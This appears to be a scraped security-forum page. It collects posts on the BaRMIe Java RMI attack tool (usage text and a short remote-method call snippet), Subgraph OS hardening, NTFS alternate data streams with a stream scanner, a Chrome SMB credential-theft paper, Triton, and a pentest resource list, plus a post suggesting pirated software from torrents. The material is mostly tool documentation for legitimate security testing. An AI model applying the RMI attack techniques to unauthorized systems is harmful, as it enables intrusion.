    $ java -jar BaRMIe.jar
    v1.0 Java RMI enumeration tool.
    Written by Nicky Bloor (@NickstaDB)

    Warning: BaRMIe was written to aid security professionals in identifying the
             insecure use of RMI services on systems which the user has prior
             permission to attack. BaRMIe must be used in accordance with all
             relevant laws. Failure to do so could lead to your prosecution.
             The developers assume no liability and are not responsible for any
             misuse or damage caused by this program.

    Usage:
      BaRMIe -enum [options] [host] [port]
        Enumerate RMI services on the given endpoint(s).
        Note: if -enum is not specified, this is the default mode.
      BaRMIe -attack [options] [host] [port]
        Enumerate and attack the given target(s).

    Options:
      --threads   The number of threads to use for enumeration (default 10).
      --timeout   The timeout for blocking socket operations (default 5,000ms).
      --targets   A file containing targets to scan. The file should contain a
                  single host or space-separated host and port pair per line.
                  Alternatively, all nmap output formats are supported; BaRMIe
                  will parse nmap output for port 1099, 'rmiregistry', or
                  'Java RMI' services to target.
                  Note: [host] [port] not supported when --targets is used.

    Reliability:
      A +/- system is used to indicate attack reliability as follows:
      [+  ]: Indicates an application-specific attack
      [-  ]: Indicates a JRE attack
      [ + ]: Attack insecure methods (such as 'writeFile' without auth)
      [ - ]: Attack Java deserialization (i.e. Object parameters)
      [  +]: Does not require non-default dependencies
      [  -]: Non-default dependencies are required
Enumeration mode (-enum) extracts details of objects that are exposed through an RMI registry service and lists any known attacks that affect the endpoint. Attack mode (-attack) first enumerates the given targets, then provides a menu system for launching known attacks against RMI services. A single target can be specified on the command line. Alternatively BaRMIe can extract targets from a simple text file or nmap output.
No Vulnerable Targets Identified? Great!
This is your opportunity to help improve BaRMIe! BaRMIe relies on some knowledge of the classes exposed over RMI, so contributions will go a long way in improving BaRMIe and the security of RMI services. If you have access to JAR files or source code for the target application then producing an attack is as simple as compiling code against the relevant JAR files. Retrieve the relevant remote object using the LocateRegistry and Registry classes and call the desired methods. Alternatively look for remote methods that accept arbitrary objects or otherwise non-primitive parameters, as these can be used to deliver deserialization payloads. More documentation on attacking RMI and producing attacks for BaRMIe will be made available in the near future. Alternatively, get in touch and provide as much detail as possible, including BaRMIe -enum output and ideally the relevant JAR files.
Attack Types
BaRMIe is capable of performing three types of attacks against RMI services. A brief description of each follows. Further technical details will be published in the near future at https://nickbloor.co.uk/. In addition to this, I presented the results of my research at 44CON 2017 and the slides can be found here: BaRMIe - Poking Java's Back Door.
1. Attacking Insecure Methods
The first and most straightforward method of attacking insecure RMI services is to simply call insecure remote methods. Often dangerous functionality is exposed over RMI which can be triggered by simply retrieving the remote object reference and calling the dangerous method. The following code is an example of this:
    import java.rmi.registry.LocateRegistry;
    import java.rmi.registry.Registry;

    //Get a reference to the remote RM registry service
    Registry reg = LocateRegistry.getRegistry(targetHost, targetPort);
    //Get a reference to the target RMI object
    Foo bar = (Foo)reg.lookup(objectName);
    //Call the remote executeCommand() method
    bar.executeCommand(cmd);
2. Deserialization via Object-type Parameters
Some RMI services do not expose dangerous functionality, or they implement security controls such as authentication and session management. If the RMI service exposes a method that accepts an arbitrary Object as a parameter then the method can be used as an entry point for deserialization attacks. Some examples of such methods can be seen below:
    public void setOption(String name, Object value);
    public void addAll(List values);
3. Deserialization via Illegal Method Invocation
Due to the use of serialization, and insecure handling of method parameters on the server, it is possible to use any method with non-primitive parameter types as an entry point for deserialization attacks. BaRMIe achieves this by using TCP proxies to modify method parameters at the network level, essentially triggering illegal method invocations. Some examples of vulnerable methods can be seen below:
    public void setName(String name);
    public Long add(Integer i1, Integer i2);
    public void sum(int[] values);
The parameters to each of these methods can be replaced with a deserialization payload as the method invocation passes through a proxy. This attack is possible because Java does not attempt to verify that remote method parameters received over the network are compatible with the actual parameter types before deserializing them.
Source: https://github.com/NickstaDB/BaRMIe
1 point
-
Subgraph OS: Adversary resistant computing platform

Subgraph OS is a desktop computing and communications platform that is designed to be resistant to network-borne exploit and malware attacks. It is also meant to be familiar and easy to use. Even in alpha, Subgraph OS looks and feels like a modern desktop operating system.

Subgraph OS includes strong system-wide attack mitigations that protect all applications as well as the core operating system, and key applications are run in sandbox environments to reduce the impact of any successful attacks against applications.

Subgraph OS was designed to reduce the risks in endpoint systems so that individuals and organizations around the world can communicate, share, and collaborate without fear of surveillance or interference by sophisticated adversaries through network-borne attacks. Subgraph OS is designed to be difficult to attack. This is accomplished through system hardening and proactive, ongoing research on defensible system design.

Hardened kernel built with grsecurity, PaX, and RAP

Subgraph OS includes a kernel hardened with the well-respected grsecurity/PaX patchset for system-wide exploit and privilege escalation mitigation. In addition to making the kernel more resistant to attacks, grsecurity and PaX security features offer strong protection to all running processes without modification (i.e. recompiling / relinking).

The Subgraph OS kernel is also built with the recently released RAP (demo from the test patch) security enhancements designed to prevent code-reuse (i.e. ROP) attacks in the kernel. This is an important mitigation against contemporary exploitation techniques and greatly increases the resistance of the kernel to modern exploits that can be used to escalate privileges once an application on the endpoint is breached. grsecurity, PaX, and RAP are essential defenses implemented in Subgraph OS.

The Subgraph OS kernel (4.9) is also built with as few features as possible while still producing a widely-usable desktop operating system. This is done to proactively reduce kernel attack surface.

Sandboxed applications

Subgraph OS runs exposed or vulnerable applications in sandbox environments. This sandbox framework, known as Oz, is unique to Subgraph OS and is designed to isolate applications from each other and from the rest of the system. Access to system resources is only granted to applications that need them. For example, the PDF viewer and the image viewer do not have access to any network interface in the sandbox they're configured to run in.

The technologies underlying Oz include Linux namespaces, restricted filesystem environments, desktop isolation, and seccomp-bpf to reduce kernel attack surface through system call whitelists. Subgraph is regularly instrumenting applications and libraries to limit the exposed kernel API to what is necessary for each sandboxed application to function. Many applications only need about one-third to one-half of the available system calls to function, and the Subgraph Oz sandbox framework ensures that the unnecessary system calls cannot be invoked (Oz can and often does restrict system calls such as ioctl(2) to specific known parameters to further narrow the kernel attack surface reachable through system calls). Subgraph OS will soon be using gosecco, a new library for seccomp-bpf that lets policies be expressed in a format that is more efficient, cross-platform, and understandable to humans.

Sandboxed applications include:
Web browser
Email client with built-in support for encryption
CoyIM instant messenger
LibreOffice productivity suite
PDF viewer
Image viewer
Video player
Hexchat

Memory Safety

Most custom code written for Subgraph OS is written in Golang, which is a memory safe language. Golang libraries are also often implemented in pure Golang, in contrast to other popular languages such as Python. While the Python runtime may be memory safe, the C libraries wrapped by so many of the commonly used Python packages expose tools written in Python to the same old memory corruption vulnerabilities.

Application firewall

Subgraph also includes an application firewall that will detect and alert the user to unexpected outbound connections by applications. The Subgraph application firewall is fairly unique among Linux-based operating systems and is an area of ongoing development.

Other security features

Subgraph OS is constantly improving and hardening the default security state of the operating system. This includes making configuration enhancements and adding entirely new mitigations. Additional security features in Subgraph OS include:
AppArmor profiles covering many system utilities and applications
Security event monitor and desktop notifications (coming soon)
Roflcoptor tor control port filter service
Port to the new seccomp-bpf golang library Gosecco

Hardened: Subgraph OS is based on a foundation designed to be resistant to attacks against operating systems and the applications they run.

Anonymized: Subgraph OS includes built-in Tor integration, and a default policy that sensitive applications only communicate over the Tor network.

Secure communication: Subgraph OS ships with a new, more secure IM client, and an e-mail client configured by default for PGP and Tor support.

Alpha release availability

Try the Subgraph OS Alpha today. You can install it on a computer, run it as a live-disk, or use it in a VM.

Source: https://subgraph.com/index.en.html
1 point
-
via: https://micahflee.com/2017/04/breaking-the-security-model-of-subgraph-os/ ... I know the author is involved in the Qubes OS team
1 point
-
ADS stands for Alternate Data Stream. It is a file attribute found only on the NTFS file system. ADS is a lesser-known feature of the Windows NTFS file system which provides the ability to put data into existing files and folders without affecting their functionality or size. It is used legitimately by Windows and other applications to store additional information (for example summary information) for a file. Even Internet Explorer adds a stream named 'Zone.Identifier' to every file downloaded from the internet. ADS have been given a bad reputation because their capability to hide data from us on our own computer has been abused by malware writers in the past.

More info:
Technet Microsoft Blog
Malware Bytes Blog on ADS
ADS on rootkitanalytics.com
More on NTFS

Tool to identify ADS on Windows Systems: ADS-Revealer

Stay safe!
1 point
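A small scanner, added here as an example and not code from ADS-Revealer or any of the linked resources, that lists a file's alternate data streams and decodes the Zone.Identifier stream described above. It assumes a Windows JVM (Java 9 or later), where Java's UserDefinedFileAttributeView is backed by NTFS alternate data streams; the AdsScan class and the sample path are constructed.

```java
import java.io.IOException;
import java.nio.ByteBuffer;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.nio.file.attribute.UserDefinedFileAttributeView;
import java.util.LinkedHashMap;
import java.util.Map;

public class AdsScan {
    // Zone.Identifier is an INI-style stream written for downloaded files, e.g.
    //   [ZoneTransfer]
    //   ZoneId=3
    // ZoneId values follow the URL security zones; 3 means "Internet".
    static final Map<Integer, String> ZONES = Map.of(
        0, "Local machine", 1, "Local intranet", 2, "Trusted sites", 3, "Internet", 4, "Restricted sites");

    /** Parses the text of a Zone.Identifier stream and returns its ZoneId, or -1 when absent. */
    static int parseZoneId(String streamText) {
        boolean inSection = false;
        for (String raw : streamText.split("\\r?\\n")) {
            String line = raw.trim();
            if (line.startsWith("[")) { inSection = line.equalsIgnoreCase("[ZoneTransfer]"); continue; }
            if (inSection && line.regionMatches(true, 0, "ZoneId=", 0, 7)) {
                try { return Integer.parseInt(line.substring(7).trim()); }
                catch (NumberFormatException e) { return -1; }
            }
        }
        return -1;
    }

    /** Maps stream name to size. Assumption: on Windows this view enumerates NTFS ADS. */
    static Map<String, Long> listStreams(Path file) throws IOException {
        UserDefinedFileAttributeView view = Files.getFileAttributeView(file, UserDefinedFileAttributeView.class);
        Map<String, Long> result = new LinkedHashMap<>();
        if (view == null) return result;  // not NTFS, or view unsupported on this platform
        for (String name : view.list()) result.put(name, (long) view.size(name));
        return result;
    }

    static String readStream(Path file, String name) throws IOException {
        UserDefinedFileAttributeView view = Files.getFileAttributeView(file, UserDefinedFileAttributeView.class);
        if (view == null) throw new IOException("alternate data streams not supported for " + file);
        ByteBuffer buf = ByteBuffer.allocate(view.size(name));
        view.read(name, buf);
        buf.flip();
        return StandardCharsets.UTF_8.decode(buf).toString();
    }

    public static void main(String[] args) throws IOException {
        Path file = Paths.get(args.length > 0 ? args[0] : "downloaded.exe");  // constructed sample path
        Map<String, Long> streams = listStreams(file);
        if (streams.isEmpty()) { System.out.println(file + ": no alternate data streams"); return; }
        for (Map.Entry<String, Long> e : streams.entrySet()) {
            System.out.printf("%s : %s (%d bytes)%n", file, e.getKey(), e.getValue());
            if (e.getKey().equalsIgnoreCase("Zone.Identifier")) {
                int zone = parseZoneId(readStream(file, e.getKey()));
                System.out.println("  ZoneId=" + zone + " -> " + ZONES.getOrDefault(zone, "unknown"));
            } else {
                // Anything other than Zone.Identifier is uncommon on a downloaded file and worth a look.
                System.out.println("  unexpected stream; inspect its content and origin");
            }
        }
    }
}
```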
-
Stealing Windows Credentials Using Google Chrome

Author/Researcher: Bosko Stankovic (bosko defensecode.com)
http://www.defensecode.com

Attacks that leak authentication credentials using the SMB file sharing protocol on Windows OS are an ever-present issue, exploited in various ways but usually limited to local area networks. One of the rare pieces of research involving attacks over the internet was recently presented by Jonathan Brossard and Hormazd Billimoria at the Black Hat security conference [1] [2] in 2015. However, there have been no publicly demonstrated SMB authentication related attacks on browsers other than Internet Explorer and Edge in the past decade. This paper describes an attack which can lead to Windows credential theft, affecting the default configuration of the most popular browser in the world today, Google Chrome, as well as all Windows versions supporting it.

Download: https://www.exploit-db.com/docs/42015.pdf
1 point
-
Triton is a dynamic binary analysis (DBA) framework. It provides internal components like a Dynamic Symbolic Execution (DSE) engine, a Taint Engine, AST representations of the x86 and x86-64 instruction set semantics, SMT simplification passes, an SMT Solver Interface and, last but not least, Python bindings. Based on these components, you are able to build program analysis tools, automate reverse engineering and perform software verification. As Triton is still a young project, please don't blame us if it is not yet reliable. Open issues or pull requests are always better than trolling =). Full documentation is available on our doxygen page.

Quick start
[*] Description
[*] Installation
[*] Examples
[*] Presentations and Publications

Internal documentation
[*] Dynamic Symbolic Execution
[*] Symbolic Execution Optimizations
[*] AST Representations of Semantics
[*] SMT Semantics Supported
[*] SMT Solver Interface
[*] SMT Simplification Passes
[*] Spread Taint
[*] Tracer Independent
[*] Python Bindings

News
A blog is available and you can follow us on twitter @qb_triton or via our RSS feed.

Support
IRC: #qb_triton@freenode
Mail: triton at quarkslab com

Authors
Jonathan Salwan - Lead dev, Quarkslab
Pierrick Brunet - Core dev, Quarkslab
Florent Saudel - Core dev, Bordeaux University
Romain Thomas - Core dev, Quarkslab

Cite Triton
    @inproceedings{SSTIC2015-Saudel-Salwan,
      author    = {Florent Saudel and Jonathan Salwan},
      title     = {Triton: A Dynamic Symbolic Execution Framework},
      booktitle = {Symposium sur la s{\'{e}}curit{\'{e}} des technologies de l'information et des communications, SSTIC, France, Rennes, June 3-5 2015},
      publisher = {SSTIC},
      pages     = {31--54},
      year      = {2015},
    }

Source: https://github.com/JonathanSalwan/Triton
1 point
-
I'll get home soon and try it. @Dragos @Fi8sVrs thanks, I tried with Fake Webcam v7 but after 2 lives Google Chrome no longer picked up the program.
1 point
-
Try https://obsproject.com/. I used it around March for a livestream on YT and it worked great. It runs on Win, Mac and Linux. You can set up a camera output containing whatever you want: your own camera, an image, a video, and the same for audio.
1 point
-
It exists online, I needed it 2 months ago, but you have to look for older versions for which you can find a key. I don't remember the program's name. Search on torrents.
1 point
-
[h=2]Awesome Penetration Testing[/h]
A collection of awesome penetration testing resources, tools, books, confs, magazines and other shiny things

[*] Online Resources
    Penetration Testing Resources
    Shell Scripting Resources
    Linux Resources
    Shellcode development
    Social Engineering Resources
    Lock Picking Resources
[*] Tools
    Penetration Testing Distributions
    Basic Penetration Testing Tools
    Vulnerability Scanners
    Network Tools
    Hex Editors
    Crackers
    Windows Utils
    DDoS Tools
    Social Engineering Tools
    Anonymity Tools
    Reverse Engineering Tools
[*] Books
    Penetration Testing Books
    Hackers Handbook Series
    Network Analysis Books
    Reverse Engineering Books
    Malware Analysis Books
    Windows Books
    Social Engineering Books
    Lock Picking Books
[*] Vulnerability Databases
[*] Security Courses
[*] Information Security Conferences
[*] Information Security Magazines
[*] Awesome Lists
[*] Contribution
[*] License

[h=3]Online Resources[/h]

[h=4]Penetration Testing Resources[/h]
Metasploit Unleashed - Free Offensive Security metasploit course
PTES - Penetration Testing Execution Standard
OWASP - Open Web Application Security Project
OSSTMM - Open Source Security Testing Methodology Manual

[h=4]Shell Scripting Resources[/h]
LSST - Linux Shell Scripting Tutorial

[h=4]Linux Resources[/h]
Kernelnewbies - A community of aspiring Linux kernel developers who work to improve their kernels

[h=4]Shellcode development[/h]
Shellcode Tutorials - Tutorials on how to write shellcode
Shellcode examples - Shellcodes database

[h=4]Social Engineering Resources[/h]
Social Engineering Framework - An information resource for social engineers

[h=4]Lock Picking Resources[/h]
Schuyler Towne channel - Lockpicking videos and security talks

[h=3]Tools[/h]

[h=4]Penetration Testing Distributions[/h]
Kali - A Linux distribution designed for digital forensics and penetration testing
NST - Network Security Toolkit distribution
Pentoo - Security-focused livecd based on Gentoo
BackBox - Ubuntu-based distribution for penetration tests and security assessments

[h=4]Basic Penetration Testing Tools[/h]
Metasploit - World's most used penetration testing software
Burp - An integrated platform for performing security testing of web applications

[h=4]Vulnerability Scanners[/h]
Netsparker - Web Application Security Scanner
Nexpose - Vulnerability Management & Risk Management Software
Nessus - Vulnerability, configuration, and compliance assessment
Nikto - Web application vulnerability scanner
OpenVAS - Open Source vulnerability scanner and manager
OWASP Zed Attack Proxy - Penetration testing tool for web applications
w3af - Web application attack and audit framework
Wapiti - Web application vulnerability scanner

[h=4]Network Tools[/h]
nmap - Free Security Scanner For Network Exploration & Security Audits
tcpdump/libpcap - A common packet analyzer that runs under the command line
Wireshark - A network protocol analyzer for Unix and Windows
Network Tools - Different network tools: ping, lookup, whois, etc
netsniff-ng - A Swiss army knife for network sniffing
Intercepter-NG - A multifunctional network toolkit

[h=4]SSL Analysis Tools[/h]
SSLyze - SSL configuration scanner

[h=4]Hex Editors[/h]
HexEdit.js - Browser-based hex editing

[h=4]Crackers[/h]
John the Ripper - Fast password cracker
Online MD5 cracker - Online MD5 hash cracker

[h=4]Windows Utils[/h]
Sysinternals Suite - The Sysinternals Troubleshooting Utilities
Windows Credentials Editor - Security tool to list logon sessions and add, change, list and delete associated credentials

[h=4]DDoS Tools[/h]
LOIC - An open source network stress tool for Windows
JS LOIC - JavaScript in-browser version of LOIC

[h=4]Social Engineering Tools[/h]
SET - The Social-Engineer Toolkit from TrustedSec

[h=4]Anonymity Tools[/h]
Tor - The free software for enabling onion routing online anonymity
I2P - The Invisible Internet Project

[h=4]Reverse Engineering Tools[/h]
IDA Pro - A Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger
WDK/WinDbg - Windows Driver Kit and WinDbg
OllyDbg - An x86 debugger that emphasizes binary code analysis

[h=3]Books[/h]

[h=4]Penetration Testing Books[/h]
The Art of Exploitation by Jon Erickson, 2008
Metasploit: The Penetration Tester's Guide by David Kennedy and others, 2011
Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014
Rtfm: Red Team Field Manual by Ben Clark, 2014
The Hacker Playbook by Peter Kim, 2014
The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013
Professional Penetration Testing by Thomas Wilhelm, 2013
Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012
Violent Python by TJ O'Connor, 2012
Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton, Adam Greene, Pedram Amini, 2007

[h=4]Hackers Handbook Series[/h]
The Shellcoders Handbook by Chris Anley and others, 2007
The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011
iOS Hackers Handbook by Charlie Miller and others, 2012
Android Hackers Handbook by Joshua J. Drake and others, 2014
The Browser Hackers Handbook by Wade Alcorn and others, 2014

[h=4]Network Analysis Books[/h]
Nmap Network Scanning by Gordon Fyodor Lyon, 2009
Practical Packet Analysis by Chris Sanders, 2011
Wireshark Network Analysis by Laura Chappell, Gerald Combs, 2012

[h=4]Reverse Engineering Books[/h]
Reverse Engineering for Beginners by Dennis Yurichev (free!)
The IDA Pro Book by Chris Eagle, 2011
Practical Reverse Engineering by Bruce Dang and others, 2014
Reverse Engineering for Beginners

[h=4]Malware Analysis Books[/h]
Practical Malware Analysis by Michael Sikorski, Andrew Honig, 2012
The Art of Memory Forensics by Michael Hale Ligh and others, 2014

[h=4]Windows Books[/h]
Windows Internals by Mark Russinovich, David Solomon, Alex Ionescu

[h=4]Social Engineering Books[/h]
The Art of Deception by Kevin D. Mitnick, William L. Simon, 2002
The Art of Intrusion by Kevin D. Mitnick, William L. Simon, 2005
Ghost in the Wires by Kevin D. Mitnick, William L. Simon, 2011
No Tech Hacking by Johnny Long, Jack Wiles, 2008
Social Engineering: The Art of Human Hacking by Christopher Hadnagy, 2010
Unmasking the Social Engineer: The Human Element of Security by Christopher Hadnagy, 2014

[h=4]Lock Picking Books[/h]
Practical Lock Picking by Deviant Ollam, 2012
Keys to the Kingdom by Deviant Ollam, 2012

[h=3]Vulnerability Databases[/h]
NVD - US National Vulnerability Database
CERT - US Computer Emergency Readiness Team
OSVDB - Open Sourced Vulnerability Database
Bugtraq - Symantec SecurityFocus
Exploit-DB - Offensive Security Exploit Database
Fulldisclosure - Full Disclosure Mailing List
MS Bulletin - Microsoft Security Bulletin
MS Advisory - Microsoft Security Advisories
Inj3ct0r - Inj3ct0r Exploit Database
Packet Storm - Packet Storm Global Security Resource
SecuriTeam - Securiteam Vulnerability Information
CXSecurity - CSSecurity Bugtraq List
Vulnerability Laboratory - Vulnerability Research Laboratory
ZDI - Zero Day Initiative

[h=3]Security Courses[/h]
Offensive Security Training - Training from BackTrack/Kali developers
SANS Security Training - Computer Security Training & Certification
Open Security Training - Training material for computer security classes
CTF Field Guide - Everything you need to win your next CTF competition

[h=3]Information Security Conferences[/h]
DEF CON - An annual hacker convention in Las Vegas
Black Hat - An annual security conference in Las Vegas
BSides - A framework for organising and holding security conferences
CCC - An annual meeting of the international hacker scene in Germany
DerbyCon - An annual hacker conference based in Louisville
PhreakNIC - A technology conference held annually in middle Tennessee
ShmooCon - An annual US east coast hacker convention
CarolinaCon - An infosec conference, held annually in North Carolina
HOPE - A conference series sponsored by the hacker magazine 2600
SummerCon - One of the oldest hacker conventions, held during Summer
Hack.lu - An annual conference held in Luxembourg
HITB - Deep-knowledge security conference held in Malaysia and The Netherlands
Troopers - Annual international IT Security event with workshops held in Heidelberg, Germany
Hack3rCon - An annual US hacker conference
ThotCon - An annual US hacker conference held in Chicago
LayerOne - An annual US security conference held every spring in Los Angeles
DeepSec - Security Conference in Vienna, Austria
SkyDogCon - A technology conference in Nashville

[h=3]Information Security Magazines[/h]
2600: The Hacker Quarterly - An American publication about technology and the computer "underground"
Hakin9 - A Polish online, weekly publication on IT Security

[h=3]Awesome Lists[/h]
SecTools - Top 125 Network Security Tools
C/C++ Programming - One of the main languages for open source security tools
.NET Programming - A software framework for Microsoft Windows platform development
Shell Scripting - Command-line frameworks, toolkits, guides and gizmos
Ruby Programming by @SiNdresorhus - JavaScript in command-line
Node.js Programming by @vndmtrx - JavaScript in command-line
Python tools for penetration testers - Lots of pentesting tools are written in Python
Python Programming by @svaksha - General Python programming
Python Programming by @vinta - General Python programming
Android Security - A collection of android security related resources
Awesome Awesomeness - The List of the Lists

[h=3]Contribution[/h]
Your contributions and suggestions are heartily welcome.

[h=3]License[/h]
This work is licensed under a Creative Commons Attribution 4.0 International License

Source: https://github.com/enaqx/awesome-pentest
1 point
-
Please, from the bottom of my heart, help me with 0.35 cents via PayPal, because I want to buy a game and that's all I still need; I'll give you a USP-S skin worth 0.55 on CSGO STEAM. PAYPAL EMAIL - specialminecraft690@yahoo.com
-1 points